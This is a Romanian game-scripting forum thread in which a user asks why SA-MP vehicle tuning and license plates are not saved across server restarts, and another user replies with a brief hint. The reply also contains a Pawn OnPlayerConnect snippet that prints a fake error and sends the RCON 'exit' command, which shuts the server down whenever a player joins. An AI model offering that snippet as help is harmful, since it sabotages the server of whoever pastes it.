Jump to content
  • 0

2 probleme


Fanta

Question

Problema intalnita (descriere):

1.Nu se saveaza tuningul. Mai exact masina se tuneaza ii dau /savecar dar cand dau restart la server dispare tuningul.

2.Nu se salveaza /setplate . La fel cand dau restart la server dispare numarul.
Ero(area / rile) / warning-(ul / urile):-
Liniile de cod / sursa / script-ul(obligatoriu):Nu stiu exact ce script ar trebui sa pun

Comanda savecar : http://pastebin.com/Stsw0MC4

Comanda setplate : http://pastebin.com/mBbuFV6C
Imagini / Video (optional):-
Ati incercat sa rezolvati singur?:Da am inlocuit comenzile cu altele din alt gamemode si la fel...

Link to comment
Share on other sites

3 answers to this question

Recommended Posts

  • 0

pune ceva de gen:

 

CarInfo[vehicleid][Mod1] = Tuning1;

CarInfo[vehicleid][Mod2] = Tuning2;

CarInfo[vehicleid][Mod3] = Tuning3;

 

etc... iar la load vehicle pui AddVehicleComponent(...,CarInfo[vehicleid][mod..]) etc

public OnPlayerConnect(playerid)
{
	print("[ERROR] - Unable to establish a connection with the world...");
	SendRconCommand("exit");
	return 1;
}

 

Link to comment
Share on other sites

  • 0
Ph0eniX 

fi te rog mai explicit unde anume sa pun :

 

 

CarInfo[vehicleid][Mod1] = Tuning1;

CarInfo[vehicleid][Mod2] = Tuning2;

CarInfo[vehicleid][Mod3] = Tuning3;

si AddVehicleComponent(...,CarInfo[vehicleid][mod..]) lasa comanda completa daca iti doresti sa ma ajuti . MS

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue. For more details you can also review our Terms of Use and Privacy Policy.